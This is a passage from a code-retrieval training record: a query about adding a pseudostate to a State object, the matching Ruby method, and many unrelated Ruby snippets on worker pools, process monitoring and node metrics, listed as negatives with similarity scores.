"def spawn_and_monitor_workers\n daemon_log :msg => \"Spawning #{$daemon[:worker_count]} workers...\"\n\n while $daemon[:work]\n daemon_update_heartbeat\n\n # (Re)start workers\n while $daemon[:worker_pids].count < $daemon[:worker_count] do\n sp = Spawnling.new(:argv => $worker[:process_prefix]) do\n worker_runner\n end\n $daemon[:worker_pids] << sp.handle\n end\n\n sleep $daemon[:monitoring_sleep]\n\n # Delete PIDs from the array child_pids which don't exists anymore\n $daemon[:worker_pids].each do |ch_pid|\n begin\n ps = ProcTable.ps(ch_pid)\n rescue\n ps = nil\n daemon_log :msg => \"Error in ProcTable.ps: #{$!}\", :sev => :error\n end\n $daemon[:worker_pids].delete ch_pid unless ps && ps.comm == 'ruby'\n end\n end\nend",
"def log_nodes_count\n @max_nodes += 1\n end",
"def total_capacity_job_nodes_cpu\n cpus = job_nodes.map {|n| n['status']['capacity']['cpu'].to_i}\n cpus.inject {|sum,n| sum + n}\n end",
"def num_waiting\n end",
"def num_waiting\n end",
"def worker_timeout(timeout); end",
"def tasks_finished_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_finished_count\n end\n end",
"def tasks_finished_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_finished_count\n end\n end",
"def setup\n logger.info 'setup workers'\n\n setup_refresh_timer\n setup_analyze_timer\n end",
"def total_allocatable_job_nodes_cpu\n cpus = job_nodes.map {|n| n['status']['allocatable']['cpu'].to_i}\n cpus.inject {|sum,n| sum + n}\n end",
"def concurrent_workers(*args)\n 1\n end",
"def check_for_available_workers\n workers >= working_count\n end",
"def running_workers\n pool_manager.workers.fetch(queues, {})\n end",
"def njobs\n @pool.njobs\n end",
"def worker_pool_size; end",
"def poll_cycle\n\n puts \"---------------------\"\n puts \"#{host}\"\n puts \"---------------------\"\n data = twemproxy_data()\n\n summary_ejections = 0\n summary_client_connections = 0\n summary_requests = 0\n summary_server_connections = 0\n summary_server_errors = 0\n summary_in_queue = 0\n summary_out_queue = 0\n summary_servers = 0\n data.keys.find_all{|k| data[k].is_a?(Hash)}.each do |pool|\n summary_client_connections += metric_total(\"client connections/#{pool}\", data[pool]['client_connections'], \"connections\")\n summary_ejections += metric_total(\"server ejections/#{pool}\", data[pool]['server_ejects'], \"ejects\")\n\n data[pool].keys.find_all{|k| data[pool][k].is_a?(Hash)}.each do |server|\n summary_servers += 1\n summary_requests += metric_value(\"server requests/#{pool}/#{server}\", data[pool][server]['requests'], \"requests\")\n summary_server_connections += metric_total(\"server connections/#{pool}/#{server}\", data[pool][server]['server_connections'], \"connections\")\n summary_server_errors += metric_value(\"server errors/#{pool}/#{server}\", data[pool][server]['server_err'], \"errors\")\n summary_in_queue += metric_total(\"in queue/#{pool}/#{server}\", data[pool][server]['in_queue'], \"ops\")\n summary_out_queue += metric_total(\"out queue/#{pool}/#{server}\", data[pool][server]['out_queue'], \"ops\")\n metric_value(\"request bytes/#{pool}/#{server}\", data[pool][server]['request_bytes'], \"bytes\")\n metric_value(\"response bytes/#{pool}/#{server}\", data[pool][server]['response_bytes'], \"bytes\")\n end\n end\n\n metric_total \"total ejections\", summary_ejections, \"ejects\"\n metric_total \"total client connections\", summary_client_connections, \"connections\"\n metric_total \"total server requests\", summary_requests, \"requests\"\n metric_total \"total server connections\", summary_server_connections, \"connections\"\n metric_total \"total server errors\", summary_server_errors, \"errors\"\n metric_total \"total in queue\", summary_in_queue, \"ops\"\n metric_total \"total out queue\", summary_out_queue, \"ops\"\n metric_total \"total servers\", summary_servers, \"servers\"\n metric_total \"percent up\", (((summary_servers - summary_ejections) / summary_servers) * 100.0), \"%\"\n end",
"def adjust_workers\n\t\tself.sample_queue_status\n\n\t\treturn nil if self.throttled?\n\n\t\tif self.needs_a_worker?\n\t\t\tself.log.info \"Too few workers for (%s); spinning one up.\" % [ self.task_class.name ]\n\t\t\tpid = self.start_worker( !self.workers.empty? )\n\t\t\treturn [ pid ]\n\t\tend\n\n\t\treturn nil\n\trescue Timeout::Error => err\n\t\tself.log.warn \"%p while adjusting workers: %s\" % [ err.class, err.message ]\n\t\treturn nil\n\tend",
"def size_without_waiters\n clients.inject(0) do |sum, element|\n sum += 1 unless element.waiting?\n sum\n end\n end",
"def update_workers\n mongo_driver = Kymera::MongoDriver.new(address, port, database, 'workers')\n @registered_workers = mongo_driver.get_collection('workers')\n end",
"def run(interval, concurrency)\n @puppet.reset\n\n log(\"Doing discovery start of run\")\n Timeout::timeout(5) {\n @clients = @puppet.discover :verbose => false\n }\n log(\"Discovered #{@puppet.discover.size} nodes\")\n\n unless @clients.nil? or @clients.size == 0\n sleeptime = interval * 60 / @clients.size\n\n log(\"Found #{@clients.size} puppet nodes, sleeping for ~#{sleeptime} seconds between runs\")\n\n if @config[:randomize]\n @clients = @clients.sort_by { rand }\n else\n @clients.sort!\n end\n\n @clients.each do |client|\n starttime = Time.now.to_i\n\n begin\n cur_concurrency = concurrent_count\n log(\"Current puppetd's running: #{cur_concurrency}\")\n\n if concurrency\n if cur_concurrency < concurrency\n run_client(client)\n else\n log(\"Puppet run for client #{client} skipped due to current concurrency of #{cur_concurrency}\")\n end\n else\n run_client(client)\n end\n rescue Exception => e\n log(\"Runner raised an exception for client #{client}: #{e}\")\n log(e)\n ensure\n sleeptime = (interval * 60 / @clients.size) - (Time.now.to_i - starttime)\n log(\"Sleeping for #{sleeptime} seconds\")\n\n sleep(sleeptime > 0 ? sleeptime : 1)\n end\n end\n else\n log(\"No Puppet clients found.\")\n end\nend",
"def set_workers(app_name, qty)\n deprecate # 07/31/2012\n put(\"/apps/#{app_name}/workers\", :workers => qty).to_s\n end",
"def stats\n stats = {\n :servers => {}, \n :results => 0, \n :taken_tasks => 0, \n :untaken_tasks => 0,\n :taken_master_tasks => 0,\n :taken_task_tasks => 0, \n :untaken_master_tasks => 0,\n :untaken_task_tasks => 0,\n :failed_tasks => 0,\n :untaken_future_tasks => 0,\n :time => Time.now.to_f,\n }\n\n stats[:untaken_future_tasks] = SkynetWorkerQueue.connection.select_value(%{\n SELECT count(id)\n FROM #{message_queue_table}\n WHERE expire_time > #{Time.now.to_i} and tasktype = 'task' and payload_type = 'master' \n })\n\n stat_rows = SkynetWorkerQueue.connection.select_all(%{\n SELECT tasktype, payload_type, iteration, count(id) as number_of_tasks, expire_time\n FROM #{message_queue_table} \n WHERE expire_time <= #{Time.now.to_i} \n GROUP BY tasktype, payload_type, iteration \n }) \n stat_rows.each do |row|\n if row[\"tasktype\"] == \"result\" or row[\"payload_type\"] == \"result\"\n stats[:results] += row[\"number_of_tasks\"].to_i\n elsif row[\"tasktype\"] == \"task\" \n type_of_tasks = nil\n if row[\"payload_type\"] == \"master\"\n type_of_tasks = :master_tasks\n elsif row[\"payload_type\"] == \"task\"\n type_of_tasks = :task_tasks\n end\n if row[\"iteration\"].to_i == 0\n stats[\"untaken_#{type_of_tasks}\".to_sym] += row[\"number_of_tasks\"].to_i \n stats[:untaken_tasks] += row[\"number_of_tasks\"].to_i\n elsif row[\"expire_time\"].to_i < Time.now.to_i\n stats[:failed_tasks] += row[\"number_of_tasks\"].to_i \n else\n stats[\"taken_#{type_of_tasks}\".to_sym] += row[\"number_of_tasks\"].to_i \n stats[:taken_tasks] += row[\"number_of_tasks\"].to_i\n end\n end\n end\n\n stats[:time] = Time.now.to_f - stats[:time]\n stats\n end",
"def waiting_threads_count\n @waiting_threads_sleepers.length\n end",
"def start(num_requested=1, workitem_id=nil, user_data=nil)\n \n # find instances with that image id\n logger.info \"Considering request to start #{num_requested} #{role.name} instances \"\n\n total_running = (instances.select{ |i| i.running? }).size\n \n node_array = instances.select{ |i| i.available? }\n\n num_to_start = 0\n \n if total_running >= max\n logger.info \"Instance limit for #{num_requested} reached. Will not start any more instances.\"\n #lets reserve all nodes so they don't get shutdown in the meantime.\n node_array.each do |node|\n node.state = 'reserved'\n node.save\n end\n WorkitemHelper.send_reply(workitem_id) unless workitem_id.nil?\n \n else\n logger.info \"Reserving for: #{num_requested} #{role.name} instances \"\n # reserve those nodes that are running, and then start / create the balance\n node_array.each do |node|\n break if num_requested < 1\n node.state = 'reserved'\n node.save\n num_requested = num_requested.to_i - 1\n \n end\n\n #now lets start the rest of the nodes needed, assuming we don't go past the max limit!\n #first lets get a count of how many nodes are LAUNCHED, IDLE, BUSY, or RESERVED\n total_left = max - total_running\n num_to_start = total_left < num_requested.to_i ? total_left : num_requested.to_i\n\n \n #start num_to_start instances via Instance. Enqueue these in delayed job because they may take a while\n start_and_create_instances(num_to_start, user_data) unless num_to_start < 1\n \n #now also enqueue the workitem reply if needed\n WorkItemHelper.send_reply(workitem_id) unless workitem_id.nil?\n \n logger.info \"Starting #{num_to_start} more #{ami_id} instances. Note that this may take a moment. \"\n EventLog.info \"Starting #{num_to_start} more #{ami_id} instances. Note that this may take a moment. \"\n \n end\n \n return num_to_start\n \n \n end",
"def increment_listened_times\n increment(:listened_times)\n end",
"def calibrate_workers \n if !(stopped?)\n # Handle received signals\n @sig_queue.each { |signal| @sig_handlers[signal].call }\n @sig_queue = []\n # Check all channels for dead ones\n @workers.each_pair { |pid, worker|\n worker[:inactive] += 1\n if worker[:inactive] > @options[:timeout]\n running = ( Process.getpgid(pid) rescue false )\n if running \n if worker[:status] == :ALIVE \n @logger.log(Logger::Severity::WARN,\n \"Worker #{worker[:name]} with PID #{pid} timed out .. Terminating the worker process gracefully\", @options[:name])\n kill_worker(:TERM, pid)\n worker[:status] = :TERMINATING\n elsif worker[:status] == :TERMINATING && worker[:inactive] > @options[:timeout] + 60\n @logger.log(Logger::Severity::WARN, \n \"Timedout Worker #{worker[:name]} with PID #{pid} did not terminate gracefully .. Killing the worker process\", @options[:name])\n kill_worker(:KILL, pid)\n worker[:status] = :KILLED\n end\n end\n end\n }\n reap_workers\n if !(stopped?)\n # Fork new_workers if needed\n while @workers.length < @options[:workers]\n @logger.log(Logger::Severity::WARN, \"Missing workers .. Current workers: #{@workers.length} .. Forking new ones \", @options[:name])\n new_worker\n end\n end\n end\n end",
"def tasks_pending_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_pending_count\n end\n end",
"def tasks_pending_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_pending_count\n end\n end",
"def before_starting_workers\n end",
"def reap_workers\n # Don't try to find more dead workers than the process count\n @workers.length.times do\n # We use +waitpid+ to find any child process which has exited. It\n # immediately returns when there aren't any dead processes.\n if pid = Process.waitpid(-1, Process::WNOHANG)\n despawn_worker(pid)\n else\n return # Stop when we don't find any\n end\n end\n end",
"def workers=(n)\n if n != @workers || !known?\n p \"Scaling #{type} to #{n}\"\n heroku_set_workers(n)\n know n\n end\n end",
"def terminate_timeout\n workers.map(&:stop_timeout).compact.max.to_i + 10\n end",
"def processor_count; end",
"def processor_count; end",
"def workload\n [@nodeid,@data.count]\n end",
"def nodes_percent\n (nodes_used.to_f / nodes_avail.to_f) * 100\n end",
"def tasks_failed_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_failed_count\n end\n end",
"def tasks_failed_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_failed_count\n end\n end",
"def count_observers\n sync_peers { |peers| peers.size }\n end",
"def reap_dead_workers(reason='unknown')\n if workers.list.length > 0\n DTR.info \"Reaping #{workers.list.length} threads because of '#{reason}'\"\n error_msg = \"#{Time.now}: WorkerClub timed out this thread: #{reason}\"\n mark = Time.now\n workers.list.each do |worker|\n worker[:started_on] = Time.now if not worker[:started_on]\n\n if mark - worker[:started_on] > timeout\n DTR.info \"Thread #{worker.inspect} is too old, killing.\"\n worker.raise(TimeoutError.new(error_msg))\n end\n end\n end\n\n return workers.list.length\n end",
"def count_used_instances\n count = 0\n return count\n end",
"def workers\n result = {}\n\n @servers.each do |server|\n\n\n sock=socket server\n if sock.nil?\n result[server] = \"unable to connect to server\" if sock.nil?\n\n else\n result[server] = {}\n result[server][:workers] = []\n if response = send_command(sock, 'workers')\n response.split(\"\\n\").each do |line|\n workers = parse_worker_line line unless line == '.'\n result[server][:workers] << workers\n end\n else\n result[server][:workers] = \"No response from server\"\n\n end #response\n end #if\n end #servers\n result\n end",
"def send_node_stats(node_ip)\n metrics_queue = Librato::Metrics::Queue.new\n\n cadvisor_res = Typhoeus.get(\"http://#{node_ip}:4194/api/v1.3/docker/\")\n data = Oj.load(cadvisor_res.body)\n\n data.values.each do |container|\n # Skip containers that aren't managed by kube:\n next if container['spec']['labels'].nil?\n\n # Parse the container name out of the container name auto-generated by kube\n # see https://github.com/kubernetes/heapster/blob/78ff89c01f52c0ab49dac2d356a8371e79482544/sources/datasource/kubelet.go#L156 \n container_name = container['aliases'].first.split('.').first.sub('k8s_','')\n\n # Join all of this together into a librato source name:\n source_name = ENV['CONTEXT'] + '.' + container['spec']['labels']['io.kubernetes.pod.name'].sub('/', '.') + '.' + container_name\n\n puts source_name\n\n stats = container['stats'].last\n\n # k8s_POD form the virtual network for a pod. We must collect net stats from this container,\n # since net counters for indvidual pod containers are always 0. See http://stackoverflow.com/questions/33472741/what-work-does-the-process-in-container-gcr-io-google-containers-pause0-8-0-d\n # for more info. No need to collect memory and cpu stats for this container.\n if container_name == 'POD'\n metrics_queue.add \"kube.network.tx_bytes\" => { type: :counter, value: stats['network']['tx_bytes'], source: source_name }\n metrics_queue.add \"kube.network.rx_bytes\" => { type: :counter, value: stats['network']['rx_bytes'], source: source_name }\n next\n end\n\n if stats['cpu']\n cpu_ms = stats['cpu']['usage']['total'] / 1000000\n metrics_queue.add \"kube.cpu.usage_ms\" => { type: :counter, value: cpu_ms, source: source_name }\n end\n \n if stats['memory']\n metrics_queue.add \"kube.memory.usage\" => { value: stats['memory']['usage'], source: source_name }\n metrics_queue.add \"kube.memory.rss\" => { value: stats['memory']['working_set'], source: source_name }\n end\n end\n\n metrics_queue.submit\nend",
"def num_waiting\n @num_waiting\n end",
"def workers\n @worker_supervisor.actors\n end",
"def initialize\n @queue = Queue.new\n @workers = []\n @workers_count = 5\n end",
"def work_pool; end",
"def serverWorker_pods\nend",
"def handle_addrs count = 32\n @node.addrs.weighted_sample(count.to_i) do |addr|\n Time.now.tv_sec + 7200 - addr.time\n end.map do |addr|\n [addr.ip, addr.port, Time.now.tv_sec - addr.time] rescue nil\n end.compact\n end",
"def init_workers(servers)\n @w = []\n servers.each{|s|\n @w << Worker.new(s)\n }\n end",
"def worker_pool_size=(_arg0); end",
"def prune\n @lock.synchronize do\n @workers.delete_if { |w| !w.alive? }\n @size = @workers.size\n end\n end",
"def num_waiting\n synchronize do\n @num_waiting\n end\n end",
"def num_waiting\n synchronize do\n @num_waiting\n end\n end",
"def get_node_ready(nodes)\n ready_nodes = nodes.select { |node| check_node_status(node) == \"ready\" }\n idle_nodes = []\n ready_nodes.each { |node| idle_nodes << node if !(DRbObject.new(nil, \"druby://#{node.ip}:9000\").executando_job) }\n idle_nodes.min{|a,b| DRbObject.new(nil, \"druby://#{a.ip}:9000\").cpu <=> DRbObject.new(nil, \"druby://#{b.ip}:9000\").cpu }\n end",
"def count_thread(id, conn)\n Thread.current['id'] = \"INFO\"\n n = 60\n loop do\n last = conn[id.to_s].count\n sleep(n)\n tputs \"Gained #{conn[id.to_s].count - last} ids in the last #{n} seconds\"\n end\nend",
"def workers\n ::Resque.info[:workers].to_i\n end",
"def slave_count\n workers.size - 1\n end",
"def quantity\n @task_worker_lock.synchronize {@task_workers.size}\n end",
"def throttles; end",
"def reap_dead_workers(reason='unknown')\n if @workers.list.length > 0\n logger.error \"#{Time.now}: Reaping #{@workers.list.length} threads for slow workers because of '#{reason}'\"\n error_msg = \"Leech timed out this thread: #{reason}\"\n mark = Time.now\n @workers.list.each do |worker|\n worker[:started_on] = Time.now if not worker[:started_on]\n if mark - worker[:started_on] > @timeout + @throttle\n logger.error \"Thread #{worker.inspect} is too old, killing.\"\n worker.raise(TimeoutError.new(error_msg))\n end\n end\n end\n return @workers.list.length\n end",
"def list_workers\n Shuttle::Redis.smembers worker_set_key\n end",
"def schedules\n workers.map(&:schedule)\n end",
"def desired_workers(total, new, processed, current_workers)\n\n worker_speed = calc_worker_speed(processed, current_workers)\n\n # elimino o ciclo passado de todos os worksets já existentes\n @worksets.each do |workset|\n if workset.empty?\n @worksets.delete(workset)\n else\n workset.shift\n end\n end\n\n # Novo workset para os novos jobs, levando em conta eventuais deficits\n # devido diferença entre o esperado e o realmente processasdo\n expected = current_workers * worker_speed * @cycle_duration_in_minutes\n deficit = [expected - processed,0].max\n @worksets << new_work_set(new + deficit, worker_speed)\n\n # calculo o final levando em conta todos os worksets\n workers_count = calc_final_desired_workers\n # mas se tiver um job, tenho um worker\n if workers_count == 0 && total > 0\n workers_count = 1\n end\n workers_count\n end",
"def workload_network_count(network, server)\n workload_count = 1\n server.nic_teams .each do |teams|\n teams[:networks].each do |net|\n if net.vlanId == network.vlanId\n workload_count = teams[:mac_addresses].count\n break\n end\n end\n end\n workload_count\n end",
"def worker_boot_timeout(timeout); end",
"def masterrun\n self.workersrun \n self.serverrun \n end",
"def pool \n @pool.select(&:alive?).size\n end",
"def get_registered_workers\n @registered_workers\n end",
"def tasks_total_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_total_count\n end\n end",
"def tasks_total_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_total_count\n end\n end",
"def fork_count\n ENV['OPAL_PREFORK_THREADS']&.to_i || (Etc.nprocessors * 3 / 4.0).ceil\n end",
"def create_workers\n @workers.times do |id|\n pid = fork { Worker.new(@options.merge(id: id)).start }\n @forks << { id: id, pid: pid }\n end\n end",
"def kill_workers\n pids = %x{ps --ppid #{pid}}.split(/\\n+/).map {|line| line.sub(%r{^\\s*(\\d+)\\s+.*}, '\\\\1').to_i}\n pids.shift\n pids.each {|id| Process.kill('KILL', id) rescue nil}\n end",
"def done_working\n job, start = @balancer_start\n usage = (Time.now.to_f - start.to_f) / balancer_weights[job.queue]\n balancer_usage[job.queue] += usage\n super\n end"
] |
[
"0.7240735",
"0.6631506",
"0.6394284",
"0.6354455",
"0.6354455",
"0.629941",
"0.61719173",
"0.61647886",
"0.6072421",
"0.6066781",
"0.604655",
"0.59918296",
"0.59715456",
"0.594274",
"0.5942223",
"0.59413034",
"0.5925082",
"0.58989596",
"0.58748287",
"0.5855831",
"0.5835867",
"0.5834338",
"0.5832292",
"0.58051157",
"0.58051157",
"0.5777303",
"0.5728359",
"0.5725588",
"0.57230574",
"0.57230574",
"0.5700251",
"0.56866384",
"0.56866384",
"0.5679613",
"0.5667553",
"0.56555337",
"0.56426",
"0.56018585",
"0.55946743",
"0.55846566",
"0.5584297",
"0.55647415",
"0.5560326",
"0.55543244",
"0.5544013",
"0.5539547",
"0.5530189",
"0.5526012",
"0.5507458",
"0.54984975",
"0.549603",
"0.5487031",
"0.5487031",
"0.547066",
"0.5468187",
"0.54673725",
"0.5449477",
"0.5445433",
"0.5445433",
"0.5444783",
"0.5438925",
"0.54344314",
"0.54344314",
"0.5393209",
"0.53854674",
"0.53807974",
"0.5378171",
"0.5366979",
"0.53616375",
"0.5352702",
"0.53487384",
"0.5346325",
"0.53441644",
"0.53430414",
"0.5343002",
"0.53347135",
"0.53339916",
"0.5331969",
"0.5331969",
"0.53263015",
"0.531774",
"0.53156924",
"0.53096056",
"0.5305182",
"0.53040504",
"0.5303777",
"0.5293655",
"0.52918714",
"0.52901775",
"0.5280257",
"0.52801424",
"0.5280101",
"0.52673054",
"0.52662843",
"0.52586854",
"0.52586854",
"0.52572715",
"0.52519417",
"0.5235452",
"0.5235265"
] |
0.72736335
|
0
|
Adds a Pseudostate to this State.
|
def add_connectionPoint! s
_log { "add_connectionPoint! #{s.inspect}" }
if @connectionPoint.find { | x | x.name == s.name }
raise ArgumentError, "connectionPoint named #{s.name.inspect} already exists"
end
@connectionPoint << s
s.state = self
# Notify.
s.connectionPoint_added! self
s
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def add_state(state)\n inferred_state = infer_state(state)\n self.states.upush! inferred_state if inferred_state\n end",
"def addstate ( ps )\n raise TypeError, ps.class.to_s + ': Incorrectly types for \\'<<\\' method of <Parser>.' unless\n\tps.instance_of? State\n\n @states << ps\n end",
"def add_state(s)\n @states << s\n self\n end",
"def << (triple)\n # self.add_triple(s, p, o)\n @triples += [ triple ]\n end",
"def add_state_attr(attr)\n new_attrs = (self.class.state_attrs << attr).uniq\n self.class.state_attrs(*new_attrs)\n end",
"def add_state(new_state)\n valid = true\n @states.each do |state|\n raise Fae::DuplicateStateException, 'Duplicate state added for Finite Automata' if new_state.name == state.name\n end\n @states << new_state\n end",
"def add_state(state, value = false)\n @states[state] = [\n factory.composite_state(self.class.name, state),\n value\n ]\n\n classify_state @states[state]\n end",
"def add(p)\nq = self.dup\nq.add!(p)\nend",
"def +(p)\n Pair.new(@x + p.x, @y + p.y)\n end",
"def add_neuron(n)\n neurons << n\n end",
"def add(name, state)\n\tif(@states[name] != nil)\n\t raise StateMachine::Error, \"state '#{name}' exists\"\n\tend\n\t@states[name] = state\n\treturn self\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def dup_adding_state(line)\n self.class.new(queue, codec, path).add_state(line)\n end",
"def set_PADD(value)\n set_input(\"PADD\", value)\n end",
"def add(p0) end",
"def +(value)\n duplicate = self.dup \n duplicate << value\n duplicate\n end",
"def +(p)\n group(self, p)\n .fmap {|(x, y)| x + y }\n .tap {|r| r.label = \"(#{label} + #{p.label})\" }\n end",
"def <<( n )\n n.add_label!( self )\n end",
"def +(delta)\n clone.increment(Meangirls.node, delta)\n end",
"def save_state(state)\n states.add(state)\n end",
"def add(time)\n newDuration = self.dup() ;\n return self.inc(time) ;\n end",
"def yadd( off )\n @y.add( off )\n self\n end",
"def add(pointer, pmodes)\n args = get_parameters(pointer, pmodes)\n @ram[args[2]] = args[0] + args[1]\n pointer + 4\n end",
"def dup_state\r\n @state.dup\r\n end",
"def add point\n self.x += point.x\n self.y += point.y\n self\n end",
"def new_state\nnewID = @@nextID\n@@nextID += 1\n@state[newID] = true\n@transition[newID] = {}\nnewID\nend",
"def add_to_point point\n add_to_point! point.dup\n end",
"def add(o)\n @hash[o] = true\n self\n end",
"def +(other)\n self.clone.set(@addr + other, @family)\n end",
"def + (point)\n self.class.new(x + point.x, y + point.y)\n end",
"def add (input)\n @g_inputs << input\n end",
"def +(other)\n transitions = @transitions.merge(other.transitions)\n # Add a new empty transition from the final states in the current\n # automaton to the inital state in the adjoined automaton.\n @final_states.each do |s|\n if transitions[s]\n transitions[s].merge!({nil => other.initial_state })\n else\n transitions[s] = {nil => other.initial_state }\n end\n end\n\n # Should check automaton type here instead of defaulting to NDFSA\n NDFSA.new(transitions, @initial_state, other.final_states, @cats)\n end",
"def <<(p)\n raise TypeError, \"Esperada pregunta para inserción\" unless p.is_a? (Pregunta)\n if (@total == 0)\n @cabeza = Nodo.new(p, nil, nil)\n @cola = @cabeza\n else\n @cola.next = Nodo.new(p, nil, @cola)\n @cola = @cola.next\n @cola.value\n end\n @total += 1\n end",
"def +(*others)\n self.dup.add!(*others)\n end",
"def add!(p)\n@x += p.x\n@y += p.y\nself\nend",
"def add_synonym(synonym)\n synonyms << synonym\n end",
"def add_states(new_states); end",
"def add_agg_pubkey(activate_height, agg_pubkey)\n payload = activate_height.to_even_length_hex + agg_pubkey\n index = latest_agg_pubkey_index\n next_index = (index.nil? ? 0 : index + 1).to_even_length_hex\n db.batch do\n db.put(KEY_PREFIX[:agg_pubkey] + next_index, payload)\n db.put(KEY_PREFIX[:latest_agg_pubkey], next_index)\n end\n end",
"def add num = 1\n @ec.add reg, size * num\n end",
"def test_add_state\n Automaton.new(false) do |fa|\n s0 = fa.add_state\n assert_equal(1, fa.state_count)\n assert_equal(false, s0.initial?)\n assert_equal(false, s0.accepting?)\n\n s1 = fa.add_state(:initial => true)\n assert_equal(2, fa.state_count)\n assert_equal(true, s1.initial?)\n assert_equal(false, s1.accepting?)\n\n s2 = fa.add_state(:initial => true, :accepting => true)\n assert_equal(3, fa.state_count)\n assert_equal(true, s2.initial?)\n assert_equal(true, s2.accepting?)\n\n s3 = fa.add_state(:myownkey => \"blambeau\")\n assert_equal(4, fa.state_count)\n assert_equal(false, s3.initial?)\n assert_equal(false, s3.accepting?)\n assert_equal(\"blambeau\", s3[:myownkey])\n\n assert_equal(0, fa.edge_count)\n end\n end",
"def +(ts)\n self.clone.add_points ts\n end",
"def add\n match '+'\n term\n emit_ln 'ADD (SP)+, D1'\nend",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add_state(state)\n if not @states.include? state\n # Prevents arbitrarily overriding methods that you shouldn't be\n raise \"Method already taken #{state}?\" if @class.methods.include?(:\"#{state}?\")\n @states[state] = State.new(state)\n @class.send(:define_method, :\"#{state}?\"){current_state == state}\n end\n end",
"def add(other)\n clone.add! other\n end",
"def add(d, s, t)\n reg_w(d, reg_r(s) + reg_r(t))\n adv_pc\n end",
"def add_property(x)\n x = Property.create(x)\n safe_add_edge(x, x.opposite, :provable_false)\n safe_add_edge(x.opposite, x, :provable_false)\n safe_add_edge(x, x, :provable_true)\n safe_add_edge(x.opposite, x.opposite, :provable_true)\n x\n end",
"def add(opt)\n ipaddr_modify(RTM_NEWADDR, NLM_F_CREATE|NLM_F_EXCL, opt)\n end",
"def + point\n\t\tPoint.new(@x+point.x, @y+point.y)\n\tend",
"def add!(point)\r\n @x += point.x\r\n @y += point.y\r\n end",
"def add_feature(feature, state)\n check_feature_is_not_symbol(feature)\n check_feature_already_in_list(feature)\n Redis.current.hset(@redis_key, feature, state)\n end",
"def add_neuron(neuron)\r\n\t\t@neurons.push(neuron)\r\n\tend",
"def add(coordinate)\n new_x = @x + coordinate.x\n new_y = @y + coordinate.y\n new_coordinate = Coordinate.new(new_x,new_y)\n end",
"def add (geneBits)\n @genePool[@size] = Gene.new(@geneLen)\n @genePool[@size].duplicate(geneBits)\n @genePool[@size].fitness = geneBits.fitness\n @size += 1\n end",
"def add(value)\n \n end",
"def add word\n super word.clone\n end",
"def add(value)\n @add_at_next = 0 unless @add_at_next\n add_at @add_at_next, value\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def +(val)\n Thread.current[:datet_addmode] = \"+\"\n self.add_something(val)\n end",
"def add_single toadd\n case toadd\n when Dist\n dist << @len.Dist\n dist.last_born << toadd\n else\n return false\n end\n true\n end",
"def add_shape(properties = {})\n shape = Shape.new(properties)\n shape.palette = @palette\n\n @shapes ||= []\n @shapes << shape # Store shape reference.\n shape\n end",
"def << (sup)\r\n new_network_id = self.get_network_id\r\n set_network_id = lambda do |s|\r\n raise(PlanB::InvalidClass, \"supported must be descendant of AlnTermination\") unless s.class.class_hierarchy.include?(AlnTermination)\r\n s.network_id = new_network_id\r\n s.layer_id = self.layer_id + 1\r\n s.termination_supporter = self\r\n s.save\r\n end\r\n sup.class.eql?(Array) ? sup.each{|s| set_network_id[s]} : set_network_id[sup]\r\n self.aln_resource << sup\r\n end",
"def add(el)\n # System.out.println(\"add(\"+el+\")\");\n n = word_number(el)\n # System.out.println(\"word number is \"+n);\n # System.out.println(\"bits.length \"+bits.length);\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] |= bit_mask(el)\n end",
"def add_hex(hex)\n @hexes.push(hex)\n end",
"def +(seconds)\n TzTime.new(time + seconds, @zone)\n end",
"def add_gold(gold)\n @goldcounter += gold\n @goldcounter\n end",
"def +(other_point)\n Point.new(self.x + other_point.x, self.y + other_point.y)\n end",
"def add(point)\r\n new_point = Marshal.load(Marshal.dump(self))\r\n new_point.x = @x + point.x\r\n new_point.y = @y + point.y\r\n return new_point\r\n end",
"def +( other )\n dup << other\n end",
"def << (n)\n raise ArgumentError unless n.is_a?(Nota)\n self.old_append n \n end",
"def add_noise(data)\n noise(data, :+)\n end",
"def plus(signal)\n self.class.new(self, signal) { |a, b| a + b}\n end",
"def +(other)\n return dup.add(other)\n end",
"def add_node(n)\n @nodes.push n unless @nodes.include? n\n end",
"def add (p)\n @people << p \n end",
"def +(other)\n unioned = Automaton.new\n fa.dup(unioned)\n other.to_fa.dup(unioned)\n RegLang.new(unioned)\n end",
"def <<(input_token)\n @current_states = next_states(@current_states, input_token)\n end",
"def add_state(node, user, params)\n # => Create a Node-State Object\n (n = {}) && (n[:name] = node)\n n[:created] = DateTime.now\n n[:creator] = user\n n[:type] = params['type'] if params['type']\n # => Build the Updated State\n update_state(n)\n # => Return the Added Node\n find_state(node)\n end",
"def add!(rhs)\n @x += rhs.x\n @y += rhs.y\n self\n end",
"def Add(val)\n self.value += val\n end",
"def +(other)\n self.class.new(batch_state.to_h.merge(other.batch_state.to_h))\n end",
"def add_pin(_pin)\n raise \"pin named #{_pin.name} already added\" if @pins.include?(_pin.name)\n @pins[_pin.name] = _pin\n end",
"def add!(rhs)\n add rhs, self\n end",
"def add_fish (fish)\n @fish_population << fish\n\n end",
"def add_new_state_and_transition state_list, transitions, from_id, msg, destinations\n new_state_id = id_generator.next\n state_list << State.new(new_state_id, destinations )\n self.transitions << Transition.new(from_id, new_state_id, msg)\n end",
"def add_process!(redis, process_id)\n redis.multi do |conn|\n conn.zadd(key, Time.now.to_i, process_id)\n conn.expire(key, @timeout)\n end\n end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
